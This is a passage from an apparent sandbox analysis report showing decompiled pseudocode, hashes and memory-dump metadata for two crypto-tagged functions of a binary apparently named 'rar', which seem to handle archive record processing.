                                                                                                            • Opcode Fuzzy Hash: 69d3932824eacdcbbf90439e5fb161c001c683a6a7b8593c7a95b26e08c3145d
                                                                                                            • Instruction Fuzzy Hash: 80E17422A18A87A6EA10DB25D4D01FD2361FF96B88F484031DE4FA7B96DF3EE515C301
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B46238 Relevance: 1.7, Strings: 1, Instructions: 420COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E00007FF67FF650B46238(void* __edx, void* __ebp, void* __eflags, long long __rbx, signed int* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r10, void* __r11) {
				void* __rbp;
				signed int _t198;
				void* _t243;
				void* _t277;
				signed int _t280;
				signed int _t282;
				intOrPtr _t287;
				signed int _t288;
				signed int _t289;
				void* _t290;
				void* _t291;
				void* _t318;
				signed long long _t319;
				signed int _t321;
				void* _t329;
				signed long long _t336;
				signed int _t344;
				signed long long _t347;
				signed long long _t348;
				signed long long _t349;
				signed long long* _t353;
				signed int* _t356;
				signed long long _t358;
				signed int _t362;
				signed long long _t376;
				signed long long _t377;
				signed long long _t379;
				long long _t397;
				long long _t420;
				void* _t425;
				signed int* _t460;
				intOrPtr* _t461;
				void* _t464;
				signed int* _t465;
				void* _t467;
				signed long long _t468;
				void* _t475;
				signed long long _t479;
				signed long long _t481;
				void* _t486;
				void* _t488;
				signed int* _t489;
				void* _t491;

				_t477 = __r11;
				_t476 = __r10;
				_t459 = __rsi;
				_t457 = __rdi;
				_t425 = __rdx;
				_t350 = __rbx;
				_t291 = __eflags;
				_t290 = __ebp;
				_t318 = _t467;
				 *((long long*)(_t318 + 0x10)) = __rbx;
				 *((long long*)(_t318 + 0x18)) = __rsi;
				 *((long long*)(_t318 + 0x20)) = __rdi;
				_t465 = _t318 - 0x1028;
				E00007FF67FF650B69CB0(0x1100, _t318, __r10, __r11);
				_t468 = _t467 - _t318;
				_t319 =  *0x50b978f0; // 0x27db226282f1
				_t465[0x3fc] = _t319 ^ _t468;
				_t489 = __rcx;
				E00007FF67FF650B164E4(0x90);
				_t321 = _t489[0xc];
				r12d = 1;
				 *((intOrPtr*)(_t321 + 0x7f83)) = r12b;
				_t362 = _t489[0xc];
				E00007FF67FF650B320B8(__rbx, _t362, __rsi, _t491);
				_t470 = _t489[0xc];
				 *((long long*)(_t489[0xc] + 0x34d0)) = _t321 - _t425 + _t362 +  *((intOrPtr*)(_t489[0xc] + 0x7f88));
				r8d = 0;
				 *0x50b80550();
				r13d = 0;
				 *(_t468 + 0x20) = r13b;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(r12d,  *((intOrPtr*)( *(_t489[0xc]) + 0x20)), _t489[0xc], _t425 + _t362 +  *((intOrPtr*)(_t489[0xc] + 0x7f88)), _t470, _t476, _t477);
				_t19 = _t479 + 1; // 0x1
				r8d = _t19;
				 *0x50b80550();
				E00007FF67FF650B48E10( *((intOrPtr*)( *(_t489[0xc]) + 0x20)), _t465 - 0x50);
				E00007FF67FF650B49140(E00007FF67FF650B490D4(_t243, _t350, _t465 - 0x50, _t425 + _t362 +  *((intOrPtr*)(_t489[0xc] + 0x7f88))), 0, _t291, _t465 - 0x50, _t425 + _t362 +  *((intOrPtr*)(_t489[0xc] + 0x7f88)));
				E00007FF67FF650B36990(_t350, _t489[0xc] + 0x5880,  *((intOrPtr*)( *(_t489[0xc]) + 0x20)), _t459, _t470);
				 *((intOrPtr*)(_t489[0xc] + 0x5890)) = r12b;
				E00007FF67FF650B36770(0, _t489[0xc] + 0x6900,  *((intOrPtr*)( *(_t489[0xc]) + 0x20)));
				E00007FF67FF650B48E40(_t350, _t465 - 0x50, _t489[0xc] + 0x68a8, _t459, _t470, _t488);
				r8d = _t489[0x12];
				 *(_t468 + 0x28) = r13d;
				 *(_t468 + 0x20) = L"RR";
				r9d = 0;
				0x50b17ac4();
				_t329 =  *(_t489[0xc]);
				 *0x50b80550();
				_t38 = _t468 + 0x68; // 0x69
				_t376 = _t38;
				E00007FF67FF650B48E10( *((intOrPtr*)(_t329 + 0x28)), _t376);
				_t280 = r13d;
				_t460 =  &(_t489[0x11]);
				 *(_t468 + 0x40) = _t460;
				if (_t489[0x13] - r13d <= 0) goto 0x50b4644c;
				_t353 = (_t376 + _t376 * 2 << 4) + _t489[2];
				_t353[2] = _t481;
				if (_t280 -  *_t460 >= 0) goto 0x50b4640a;
				_t377 = _t376 * _t489[0x14];
				_t353[1] = _t377;
				_t379 =  >=  ? _t489[0x16] - _t377 : _t489[0x14];
				 *_t353 = (_t379 & _t479) + _t379;
				goto 0x50b46441;
				_t353[1] = _t379 * _t489[0x1a] +  *((intOrPtr*)(_t329 + 0x28));
				_t336 = _t489[0x1a];
				 *_t353 = _t336;
				E00007FF67FF650B69B9C(_t489[0xc] + 0x68a8, _t475);
				_t353[3] = _t336;
				_t353[4] =  ~_t336 + _t336;
				if (_t280 + r12d - _t489[0x13] < 0) goto 0x50b463cb;
				goto 0x50b46451;
				 *(_t468 + 0x40) = _t460;
				E00007FF67FF650B69B9C(_t489[0xc] + 0x68a8, _t475);
				_t489[8] = _t336;
				r15d = r15d & 0x0000000f;
				 *((long long*)(_t465 - 0x58)) =  ~_t336 + _t336;
				 *(_t468 + 0x50) = _t481;
				E00007FF67FF650B5B008();
				 *(_t468 + 0x38) = r13b;
				 *(_t468 + 0x48) = _t481;
				r12d = r13d;
				_t282 = r13d;
				if ( *_t460 - r13d <= 0) goto 0x50b465ed;
				if ((dil & 0x00000007) != 0) goto 0x50b464a0;
				E00007FF67FF650B5B008();
				_t356 = (_t336 + _t336 * 2 << 4) + _t489[2];
				r8d = 0;
				 *0x50b80550();
				if (_t282 != 0) goto 0x50b464db;
				 *(_t468 + 0x48) = _t356[4] + _t356[2];
				if ( *_t489 -  *_t356 - _t356[4] >= 0) goto 0x50b464ec;
				r13d =  *_t489;
				goto 0x50b464f3;
				r13d =  *_t356;
				r13d = r13d - _t356[4];
				r8d = r13d;
				_t198 =  *0x50b80550();
				_t288 = _t198;
				if (r13d == _t198) goto 0x50b46525;
				E00007FF67FF650B2CB88(r13d - _t198, 0x50ba7ab8, _t489[0xc] + 0x3a);
				_t356[0xa] = _t288;
				_t356[4] = _t460 + _t356[4];
				if (_t282 !=  *( *(_t468 + 0x40)) - 1) goto 0x50b46564;
				if (_t288 - r12d >= 0) goto 0x50b46564;
				r8d = r12d;
				r8d = r8d - _t288;
				E00007FF67FF650B6C1A0( *( *(_t468 + 0x40)) - 1, 0, _t460 +  ~_t336 + _t336, _t460 + _t356[4], _t470 * _t489[0x1a]);
				r13d = 0;
				if (_t282 != 0) goto 0x50b46583;
				r13d =  *(_t468 + 0x38);
				r13d = r13b & 0xffffffff;
				r13d =  ==  ? 1 : r13d;
				 *(_t468 + 0x38) = r13d;
				r13d = 0;
				r12d =  >  ? _t288 : r12d;
				r9d = _t288;
				E00007FF67FF650B45E20(_t282, _t356, _t489, _t460, _t465,  ~_t336 + _t336, _t481, _t479);
				r9d = r12d;
				E00007FF67FF650B45F0C(_t282, _t356, _t489, _t356[4],  ~_t336 + _t336);
				_t358 = _t460 +  *(_t468 + 0x50);
				 *(_t468 + 0x50) = _t358;
				_t344 = _t489[0xc];
				if ( *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x22d8)) + 0x7154)) != r13b) goto 0x50b465de;
				_t474 = _t489[0x16];
				E00007FF67FF650B5CE78(_t282,  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x22d8)) + 0x7154)) - r13b, _t344, _t358, _t358, __rdi, _t460, _t489[0x16], _t475);
				_t461 =  *(_t468 + 0x40);
				if (_t282 + 1 -  *_t461 < 0) goto 0x50b46495;
				 *(_t468 + 0x34) = r13d;
				if (_t489[0x12] - r13d <= 0) goto 0x50b46845;
				r15d = r13d;
				 *(_t465 - 0x60) = _t358;
				_t486 = (_t344 + _t358 + (_t344 + _t358) * 2 << 4) + _t489[2];
				_t397 = _t489[0xc];
				r8d = 0;
				_t347 =  *((intOrPtr*)( *_t397 + 0x20));
				 *0x50b80550();
				 *((long long*)(_t468 + 0x60)) = _t397;
				 *(_t468 + 0x30) =  *(_t468 + 0x30) & 0;
				 *((intOrPtr*)(_t468 + 0x3c)) = 0;
				if (r12d == 0) goto 0x50b46823;
				E00007FF67FF650B5B008();
				_t109 = _t468 + 0x68; // 0x69
				E00007FF67FF650B49118(_t109,  *((intOrPtr*)(_t486 + 8)) +  *((intOrPtr*)(_t486 + 0x10)));
				_t110 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48F70(0, _t358, _t110,  *((intOrPtr*)(_t486 + 8)) +  *((intOrPtr*)(_t486 + 0x10)), _t489[0x16]);
				_t111 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48EE8(_t358, _t111,  *((intOrPtr*)(_t486 + 8)) +  *((intOrPtr*)(_t486 + 0x10)), _t489[0x16]);
				_t112 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48EE8(_t358, _t112,  *((intOrPtr*)(_t486 + 8)) +  *((intOrPtr*)(_t486 + 0x10)), _t489[0x16]);
				 *(_t468 + 0x58) = _t347;
				_t115 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48FF4(0, r12d, _t358, _t115, __rdi +  *(_t468 + 0x48), _t461, _t489[0x16], _t475, _t464);
				_t348 = _t489[2];
				_t277 =  >  ? 0x10000 :  *((intOrPtr*)(_t348 + 0x28 + (_t347 + _t347 * 2 + _t347 + _t347 * 2) * 8));
				_t122 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48F70(0, _t358, _t122, __rdi +  *(_t468 + 0x48), _t489[0x16]);
				_t124 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48FF4(0,  *((intOrPtr*)(_t348 + 0x28 + (_t347 + _t347 * 2 + _t347 + _t347 * 2) * 8)) - 0x10000, _t358, _t124, _t489[0x16], _t461, _t474, _t475);
				_t126 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48FF4(0,  *((intOrPtr*)(_t348 + 0x28 + (_t347 + _t347 * 2 + _t347 + _t347 * 2) * 8)) - 0x10000, _t358, _t126, _t489[0x14], _t461, _t474, _t475);
				_t128 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48FF4(0,  *((intOrPtr*)(_t348 + 0x28 + (_t347 + _t347 * 2 + _t347 + _t347 * 2) * 8)) - 0x10000, _t358, _t128, _t489[0x1a], _t461, _t474, _t475);
				_t129 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48F20(_t358, _t129, _t489[0x1a], _t474);
				_t131 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48F20(_t358, _t131, _t489[0x1a], _t474);
				_t132 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48F20(_t358, _t132, _t358, _t474);
				if ( *_t461 <= 0) goto 0x50b4674c;
				r15d =  *(_t468 + 0x30);
				_t138 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48FF4(0,  *_t461, _t358, _t138,  *((intOrPtr*)(_t489[4] + _t348 * 8)), _t461, _t474, _t475);
				if (1 -  *_t461 < 0) goto 0x50b46725;
				_t141 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48FF4(0, 1 -  *_t461, _t358, _t141, _t489[0x1e], _t461, _t474, _t475);
				 *((intOrPtr*)(_t465 - 0x10)) = 0x7d42527b;
				r8d = 0xff0;
				_t143 = _t468 + 0x68; // 0x69
				E00007FF67FF650B48EAC(_t143, _t465, _t474);
				_t144 = _t348 + 0x10; // 0x10
				_t289 = _t144;
				 *_t465 = _t289;
				_t248 =  <  ? r12d : 0x10000;
				 *((intOrPtr*)(_t465 - 4)) = _t358 + _t461;
				_t147 = _t461 - 0xc; // 0x4
				r8d = _t147;
				E00007FF67FF650B28658(_t348, _t358, _t143 | 0xffffffff, _t465 - 4, __rdi, _t474);
				r8d = 0x10000;
				E00007FF67FF650B28658(_t348, _t358, _t348,  *(_t468 + 0x58) +  *((intOrPtr*)(_t486 + 0x20)), _t457, _t474);
				_t349 =  !_t348;
				 *(_t465 - 0xc) = _t349;
				r8d = _t289;
				E00007FF67FF650B329C4( <  ? r12d : 0x10000, _t489[0x12], _t290, _t349, _t358, _t489[0xc], _t465 - 0x10, _t474);
				r8d = 0x10000;
				E00007FF67FF650B329C4( <  ? r12d : 0x10000, _t489[0x12], _t290, _t349, _t358, _t489[0xc],  *(_t468 + 0x58) +  *((intOrPtr*)(_t486 + 0x20)), _t474);
				_t420 =  *((intOrPtr*)(_t468 + 0x60)) + _t349;
				 *((long long*)(_t468 + 0x60)) = _t420;
				_t287 =  *((intOrPtr*)(_t468 + 0x3c)) + 0x10000;
				 *((intOrPtr*)(_t468 + 0x3c)) = _t287;
				 *(_t468 + 0x30) =  *(_t468 + 0x30) + 1;
				if (_t287 - r12d < 0) goto 0x50b46652;
				r15d =  *(_t468 + 0x34);
				goto 0x50b46828;
				 *((intOrPtr*)(_t486 + 0x10)) =  *((intOrPtr*)(_t486 + 0x10)) + _t420;
				r15d = r15d + 1;
				 *(_t468 + 0x34) = r15d;
				if (r15d - _t489[0x12] < 0) goto 0x50b465ff;
				r13d = 0;
				if ( *(_t468 + 0x38) == r13b) goto 0x50b46477;
				E00007FF67FF650B164E4(0x91);
				_t172 = _t468 + 0x68; // 0x69
				E00007FF67FF650B11534(_t172);
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t465 - 0x50), 0x91, _t465[0x3fc] ^ _t468);
			}














































                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b46238
                                                                                                            0x7ff650b4623b
                                                                                                            0x7ff650b4623f
                                                                                                            0x7ff650b46243
                                                                                                            0x7ff650b46250
                                                                                                            0x7ff650b4625c
                                                                                                            0x7ff650b46261
                                                                                                            0x7ff650b46264
                                                                                                            0x7ff650b4626e
                                                                                                            0x7ff650b46275
                                                                                                            0x7ff650b4627d
                                                                                                            0x7ff650b46282
                                                                                                            0x7ff650b46286
                                                                                                            0x7ff650b4628c
                                                                                                            0x7ff650b46293
                                                                                                            0x7ff650b46297
                                                                                                            0x7ff650b4629c
                                                                                                            0x7ff650b462bb
                                                                                                            0x7ff650b462c9
                                                                                                            0x7ff650b462d0
                                                                                                            0x7ff650b462d6
                                                                                                            0x7ff650b462d9
                                                                                                            0x7ff650b462de
                                                                                                            0x7ff650b462e1
                                                                                                            0x7ff650b462eb
                                                                                                            0x7ff650b462f9
                                                                                                            0x7ff650b462f9
                                                                                                            0x7ff650b46302
                                                                                                            0x7ff650b4630c
                                                                                                            0x7ff650b46325
                                                                                                            0x7ff650b46338
                                                                                                            0x7ff650b46341
                                                                                                            0x7ff650b46355
                                                                                                            0x7ff650b46369
                                                                                                            0x7ff650b4636e
                                                                                                            0x7ff650b46377
                                                                                                            0x7ff650b46383
                                                                                                            0x7ff650b46388
                                                                                                            0x7ff650b46391
                                                                                                            0x7ff650b4639a
                                                                                                            0x7ff650b463a1
                                                                                                            0x7ff650b463aa
                                                                                                            0x7ff650b463aa
                                                                                                            0x7ff650b463af
                                                                                                            0x7ff650b463b5
                                                                                                            0x7ff650b463b8
                                                                                                            0x7ff650b463bc
                                                                                                            0x7ff650b463c5
                                                                                                            0x7ff650b463d5
                                                                                                            0x7ff650b463d9
                                                                                                            0x7ff650b463df
                                                                                                            0x7ff650b463e1
                                                                                                            0x7ff650b463e6
                                                                                                            0x7ff650b463f8
                                                                                                            0x7ff650b46405
                                                                                                            0x7ff650b46408
                                                                                                            0x7ff650b46416
                                                                                                            0x7ff650b4641a
                                                                                                            0x7ff650b4641e
                                                                                                            0x7ff650b46428
                                                                                                            0x7ff650b4642d
                                                                                                            0x7ff650b4643d
                                                                                                            0x7ff650b46448
                                                                                                            0x7ff650b4644a
                                                                                                            0x7ff650b4644c
                                                                                                            0x7ff650b46458
                                                                                                            0x7ff650b4645d
                                                                                                            0x7ff650b46467
                                                                                                            0x7ff650b4646e
                                                                                                            0x7ff650b46472
                                                                                                            0x7ff650b46477
                                                                                                            0x7ff650b4647c
                                                                                                            0x7ff650b46481
                                                                                                            0x7ff650b46486
                                                                                                            0x7ff650b46489
                                                                                                            0x7ff650b4648f
                                                                                                            0x7ff650b46499
                                                                                                            0x7ff650b4649b
                                                                                                            0x7ff650b464aa
                                                                                                            0x7ff650b464bd
                                                                                                            0x7ff650b464c4
                                                                                                            0x7ff650b464cc
                                                                                                            0x7ff650b464d6
                                                                                                            0x7ff650b464e5
                                                                                                            0x7ff650b464e7
                                                                                                            0x7ff650b464ea
                                                                                                            0x7ff650b464ec
                                                                                                            0x7ff650b464ef
                                                                                                            0x7ff650b464fa
                                                                                                            0x7ff650b46504
                                                                                                            0x7ff650b4650a
                                                                                                            0x7ff650b4650f
                                                                                                            0x7ff650b46520
                                                                                                            0x7ff650b46525
                                                                                                            0x7ff650b4652f
                                                                                                            0x7ff650b46543
                                                                                                            0x7ff650b46548
                                                                                                            0x7ff650b4654a
                                                                                                            0x7ff650b4654d
                                                                                                            0x7ff650b46556
                                                                                                            0x7ff650b46564
                                                                                                            0x7ff650b46569
                                                                                                            0x7ff650b4656b
                                                                                                            0x7ff650b46570
                                                                                                            0x7ff650b46577
                                                                                                            0x7ff650b4657b
                                                                                                            0x7ff650b46580
                                                                                                            0x7ff650b46586
                                                                                                            0x7ff650b4658a
                                                                                                            0x7ff650b46595
                                                                                                            0x7ff650b4659a
                                                                                                            0x7ff650b465a5
                                                                                                            0x7ff650b465af
                                                                                                            0x7ff650b465b2
                                                                                                            0x7ff650b465b7
                                                                                                            0x7ff650b465c9
                                                                                                            0x7ff650b465cb
                                                                                                            0x7ff650b465d9
                                                                                                            0x7ff650b465e0
                                                                                                            0x7ff650b465e7
                                                                                                            0x7ff650b465ed
                                                                                                            0x7ff650b465f6
                                                                                                            0x7ff650b465fc
                                                                                                            0x7ff650b46602
                                                                                                            0x7ff650b46613
                                                                                                            0x7ff650b46617
                                                                                                            0x7ff650b46626
                                                                                                            0x7ff650b46629
                                                                                                            0x7ff650b4662d
                                                                                                            0x7ff650b46635
                                                                                                            0x7ff650b4663a
                                                                                                            0x7ff650b46640
                                                                                                            0x7ff650b46647
                                                                                                            0x7ff650b46652
                                                                                                            0x7ff650b46657
                                                                                                            0x7ff650b4665c
                                                                                                            0x7ff650b46663
                                                                                                            0x7ff650b46668
                                                                                                            0x7ff650b46672
                                                                                                            0x7ff650b46677
                                                                                                            0x7ff650b46681
                                                                                                            0x7ff650b46686
                                                                                                            0x7ff650b4668d
                                                                                                            0x7ff650b46696
                                                                                                            0x7ff650b4669b
                                                                                                            0x7ff650b466ab
                                                                                                            0x7ff650b466bc
                                                                                                            0x7ff650b466bf
                                                                                                            0x7ff650b466c4
                                                                                                            0x7ff650b466cd
                                                                                                            0x7ff650b466d2
                                                                                                            0x7ff650b466db
                                                                                                            0x7ff650b466e0
                                                                                                            0x7ff650b466e9
                                                                                                            0x7ff650b466ee
                                                                                                            0x7ff650b466f5
                                                                                                            0x7ff650b466fa
                                                                                                            0x7ff650b46703
                                                                                                            0x7ff650b46708
                                                                                                            0x7ff650b46710
                                                                                                            0x7ff650b46715
                                                                                                            0x7ff650b4671e
                                                                                                            0x7ff650b46720
                                                                                                            0x7ff650b46737
                                                                                                            0x7ff650b4673c
                                                                                                            0x7ff650b46745
                                                                                                            0x7ff650b46750
                                                                                                            0x7ff650b46755
                                                                                                            0x7ff650b4675a
                                                                                                            0x7ff650b46761
                                                                                                            0x7ff650b4676b
                                                                                                            0x7ff650b46770
                                                                                                            0x7ff650b46775
                                                                                                            0x7ff650b46775
                                                                                                            0x7ff650b46778
                                                                                                            0x7ff650b46789
                                                                                                            0x7ff650b4678f
                                                                                                            0x7ff650b46792
                                                                                                            0x7ff650b46792
                                                                                                            0x7ff650b4679e
                                                                                                            0x7ff650b467ac
                                                                                                            0x7ff650b467b2
                                                                                                            0x7ff650b467b7
                                                                                                            0x7ff650b467ba
                                                                                                            0x7ff650b467be
                                                                                                            0x7ff650b467c9
                                                                                                            0x7ff650b467d7
                                                                                                            0x7ff650b467de
                                                                                                            0x7ff650b467ea
                                                                                                            0x7ff650b467ed
                                                                                                            0x7ff650b467fb
                                                                                                            0x7ff650b467fd
                                                                                                            0x7ff650b46806
                                                                                                            0x7ff650b46816
                                                                                                            0x7ff650b4681c
                                                                                                            0x7ff650b46821
                                                                                                            0x7ff650b46828
                                                                                                            0x7ff650b4682c
                                                                                                            0x7ff650b4682f
                                                                                                            0x7ff650b46838
                                                                                                            0x7ff650b46842
                                                                                                            0x7ff650b4684a
                                                                                                            0x7ff650b46855
                                                                                                            0x7ff650b4685b
                                                                                                            0x7ff650b46860
                                                                                                            0x7ff650b4689e

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: {RB}
                                                                                                            • API String ID: 0-515449433
                                                                                                            • Opcode ID: 09202419ffd89e61332c3522a1750a13287e77664f09bf36f6de7f217334cba4
                                                                                                            • Instruction ID: 77cc320f2c60636f9cd7d8c7a9c60cbce26ae19483c6820c4dafea864c5f6ce8
                                                                                                            • Opcode Fuzzy Hash: 09202419ffd89e61332c3522a1750a13287e77664f09bf36f6de7f217334cba4
                                                                                                            • Instruction Fuzzy Hash: A512D173B14A42A6DB00DF29E4845AE7766FB89B88F095032EF8E97769CF39D544C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B51D64 Relevance: 1.6, Strings: 1, Instructions: 331COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00007FF67FF650B51D64(void* __ebx, intOrPtr __edi, void* __ebp, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r10, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t107;
				void* _t117;
				void* _t119;
				signed char _t125;
				signed char _t127;
				char _t129;
				char _t130;
				void* _t141;
				void* _t143;
				void* _t146;
				signed int _t149;
				char _t154;
				intOrPtr _t166;
				void* _t167;
				intOrPtr _t170;
				intOrPtr _t171;
				long long _t212;
				long long _t213;
				signed long long _t218;
				signed long long _t219;
				void* _t235;
				intOrPtr* _t236;
				void* _t292;
				void* _t299;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t309;
				void* _t317;
				void* _t322;
				void* _t325;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t332;

				_t324 = __r11;
				_t270 = __rdx;
				_t166 = __edi;
				_t146 = __ebx;
				 *((long long*)(_t308 + 8)) = __rcx;
				_t2 = _t308 - 0x1f; // 0x759
				_t306 = _t2;
				_t309 = _t308 - 0x88;
				_t3 = _t270 + 0x3490; // 0x3ca0
				_t236 = __rdx;
				_t326 = __r8;
				r8d = 8;
				_t107 =  *0x50b80550(_t305);
				_t5 = _t299 - 5; // 0x3
				r14d = _t5;
				if (_t107 != 8) goto 0x50b51dc0;
				if (E00007FF67FF650B19284( *((intOrPtr*)( *__rdx + 0x18)), _t3, _t3, __r8) == r14d) goto 0x50b51dd5;
				r8d = 0;
				_t212 =  *((intOrPtr*)( *__rdx + 0x20));
				 *0x50b80550();
				r9d = 0;
				 *((intOrPtr*)(__r8 + 0x7f78)) = r14d;
				r8d = 0;
				 *((char*)(_t309 + 0x20)) = 0;
				E00007FF67FF650B1B4D8(0, _t212, __r8, _t3, __r8, __r10, __r11);
				E00007FF67FF650B69B9C(_t3, _t317);
				_t333 = _t212;
				r13d = 0;
				r14b = 0;
				 *(_t306 - 0x21) =  *(_t306 - 0x21) & r13d;
				 *(_t306 - 0x2d) = r13d;
				_t213 =  *((intOrPtr*)( *_t236 + 0x28));
				 *((intOrPtr*)(_t306 + 0x77)) = r14b;
				 *0x50b80550();
				_t300 = _t213;
				E00007FF67FF650B320B8(_t236, _t236, _t213, _t332);
				 *((long long*)(_t306 + 7)) = _t213;
				E00007FF67FF650B52FB8(_t146, _t236, _t236, _t3, 0x7fffffff);
				E00007FF67FF650B52FB8(_t146, _t236, _t236, _t213, _t213);
				r8d = 0;
				 *0x50b80550();
				r8d = 0x1000000;
				_t117 =  *0x50b80550();
				_t295 = _t117;
				 *((intOrPtr*)(_t306 - 0x35)) = _t166;
				if (_t117 - 7 < 0) goto 0x50b521d6;
				r13d = 0;
				 *((intOrPtr*)(_t306 + 0x7f)) = r14b;
				r14d = _t166;
				_t19 = _t328 + 4; // 0x4
				r8d = _t19;
				_t149 =  *(_t306 - 0x21) + 1;
				 *((intOrPtr*)(_t306 - 0x1d)) = r14d;
				 *((long long*)(_t306 - 0x11)) = _t212;
				 *((intOrPtr*)(_t306 - 0x31)) = r8d;
				 *(_t306 - 0x21) = _t149;
				if ((_t149 & 0x000fffff) != 0) goto 0x50b51ece;
				E00007FF67FF650B5B008();
				r8d =  *((intOrPtr*)(_t306 - 0x31));
				_t218 =  *((intOrPtr*)(_t306 - 0x11));
				if (r14d - 7 < 0) goto 0x50b5217a;
				if (_t166 != 0x1000000) goto 0x50b51eed;
				if (r14d - 0x10000 < 0) goto 0x50b5217a;
				_t29 = _t306 + 0x6f; // 0x7c8
				 *((intOrPtr*)(_t306 - 0x39)) = r8d;
				_t31 = _t306 - 0x39; // 0x720
				r8d = r8d + 3;
				 *(_t306 - 0x29) =  *_t218;
				_t119 = E00007FF67FF650B48C68(_t218, _t236, _t212, _t31, _t117, _t29, __r11, _t330);
				r14d =  *((intOrPtr*)(_t306 - 0x39));
				r8d = _t166;
				 *(_t306 - 9) = _t218;
				r8d = r8d - r14d;
				 *((intOrPtr*)(_t306 - 0x19)) = r14d -  *((intOrPtr*)(_t306 - 0x31));
				if ( *((char*)(_t306 + 0x6f)) != 0) goto 0x50b52072;
				if (r8d - 6 < 0) goto 0x50b52072;
				if (_t119 - 2 < 0) goto 0x50b52072;
				if (_t119 - r8d > 0) goto 0x50b52072;
				if (_t119 - 0x10000 > 0) goto 0x50b52072;
				_t38 = _t306 + 0x6f; // 0x7c8
				_t39 = _t306 - 0x39; // 0x720
				r8d =  >  ? 8 : r8d;
				r8d = r8d + r14d;
				E00007FF67FF650B48C68(_t218, _t236, _t212, _t39, _t117, _t38, __r11, _t328);
				_t167 = _t166 -  *((intOrPtr*)(_t306 - 0x39));
				 *(_t306 - 1) = _t218;
				if ( *((char*)(_t306 + 0x6f)) != 0) goto 0x50b5206f;
				if (_t167 - 1 < 0) goto 0x50b5206f;
				_t43 = _t218 - 1; // -1
				if (_t43 - 4 > 0) goto 0x50b5206f;
				r8d = r8d +  *((intOrPtr*)(_t306 - 0x19));
				if ( !(E00007FF67FF650B28538(_t146, _t43 | 0xffffffff, _t218, _t236, _t212, _t39 + _t333, _t117, _t213,  *(_t306 - 9))) !=  *(_t306 - 0x29)) goto 0x50b5206f;
				_t48 = _t306 + 0x6f; // 0x7c8
				_t49 = _t306 - 0x39; // 0x720
				_t168 =  >  ? 8 : _t167;
				_t169 = ( >  ? 8 : _t167) +  *((intOrPtr*)(_t306 - 0x39));
				r8d = ( >  ? 8 : _t167) +  *((intOrPtr*)(_t306 - 0x39));
				_t125 = E00007FF67FF650B48C68(_t218, _t236, _t333, _t49, _t117, _t48, _t324, _t325);
				_t170 =  *((intOrPtr*)(_t306 - 0x35));
				 *(_t306 - 0x29) = _t218;
				if ( *((char*)(_t306 + 0x6f)) != 0) goto 0x50b52072;
				if ((_t125 & 0x00000001) == 0) goto 0x50b5201e;
				_t56 = _t306 + 0x6f; // 0x7c8
				r8d = _t170;
				_t57 = _t306 - 0x39; // 0x720
				r8d = r8d -  *((intOrPtr*)(_t306 - 0x39));
				r8d =  >  ? 3 : r8d;
				r8d = r8d +  *((intOrPtr*)(_t306 - 0x39));
				_t127 = E00007FF67FF650B48C68(_t218, _t236, _t333, _t57, _t117, _t56, _t324, _t292);
				if ( *((char*)(_t306 + 0x6f)) != 0) goto 0x50b52072;
				_t219 =  *(_t306 - 0x29);
				 *(_t306 - 0x29) =  *(_t306 - 0x29) & 0x00000000;
